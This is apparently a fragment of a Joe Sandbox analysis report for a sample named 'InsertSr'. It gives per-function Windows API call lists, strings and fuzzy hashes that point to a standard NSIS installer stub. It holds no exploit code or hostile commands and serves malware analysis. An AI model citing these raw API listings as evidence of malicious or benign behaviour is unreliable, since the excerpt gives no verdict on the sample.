                                                                            • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                            • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                            • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                            • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                            • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                            • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                              • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                            • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                            • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                            • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                            • API String ID: 20674999-2124804629
                                                                            • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                            • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                            • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                            • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                            • GetSysColor.USER32(?), ref: 004041AF
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                            • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                              • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                              • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                              • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                            • SendMessageW.USER32(00000000), ref: 00404251
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                            • SetCursor.USER32(00000000), ref: 004042D2
                                                                            • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                            • SetCursor.USER32(00000000), ref: 004042F6
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                            • String ID: @%F$N$open
                                                                            • API String ID: 3928313111-3849437375
                                                                            • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                            • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                            • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                            • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                            APIs
                                                                            • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                            • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                              • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                              • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                            • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                            • wsprintfA.USER32 ref: 00406B4D
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                              • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                              • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                            • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                            • String ID: F$%s=%s$NUL$[Rename]
                                                                            • API String ID: 565278875-1653569448
                                                                            • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                            • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                            • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                            • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                            • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                            • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                            • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                            • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                            APIs
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                            • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                            • API String ID: 1641139501-220328614
                                                                            • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                            • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                            • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                            • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                            Strings
                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                            • String ID: created uninstaller: %d, "%s"
                                                                            • API String ID: 3294113728-3145124454
                                                                            • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                            • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                            • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                            • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                            • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                            • API String ID: 3734993849-2769509956
                                                                            • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                            • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                            • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                            • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                            • GetSysColor.USER32(00000000), ref: 00403E00
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                            • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                            • GetSysColor.USER32(?), ref: 00403E2B
                                                                            • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                            • DeleteObject.GDI32(?), ref: 00403E55
                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                            • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                            • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                            • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                            • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                            Strings
                                                                            • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                            • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                            • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                            • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                            • API String ID: 1033533793-945480824
                                                                            • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                            • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                            • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                            • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                            APIs
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                              • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                              • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                            Strings
